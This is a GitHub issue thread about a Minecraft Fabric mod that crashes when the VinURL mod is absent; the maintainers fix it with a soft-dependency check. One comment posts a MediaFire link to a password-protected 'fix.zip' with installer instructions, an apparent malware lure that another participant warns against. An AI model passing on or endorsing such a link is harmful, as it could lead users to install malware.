### ISSUE TITLE
[BUG] Newest Release 1.0.1 Crashes when using without VinURL

### ISSUE THREAD

**Issue by Plompi** [pnk2u/More-Jukebox-Noteblock-Variants#2]
I just tested the new implementation we both worked on and it seems, that if Vinurl is not installed the game crashes when inserting a normal music disc into the jukebox, because the code depends on Vinurl being installed. I'm not that familiar with ensuring compatibility with other mods so another approach as of now might be neccessary

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Plompi** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

wtf is that, do not download that!

**Comment by pnk2u** [comment]
Thanks for testing and notifying me so quickly. I absolutely overlooked that.
The thing is, from my understanding, if I use modImplementation like you suggested, it always loads and includes your mod and I don't think that's ideal.

**Comment by pnk2u** [comment]
Ah, okay, I think I should just be able to wrap the checks/code using vinURL's methods/classes in an extra if statement that gets set to true on initialize if vinURL is loaded by the fabric loader instance.

**Comment by Plompi** [comment]
yep, i asked in the fabric discord server and there i was informed about this [article](https://github.com/natanfudge/fabric-docs/blob/master/newdocs/Modding-Tutorials/Adding%20other%20mods.md) see "Adding soft dependencies". So your idea is the right way to do it

**Comment by pnk2u** [comment]
Perfect, thanks for asking about it, the newest version (1.0.2) should now be working as intended. (:
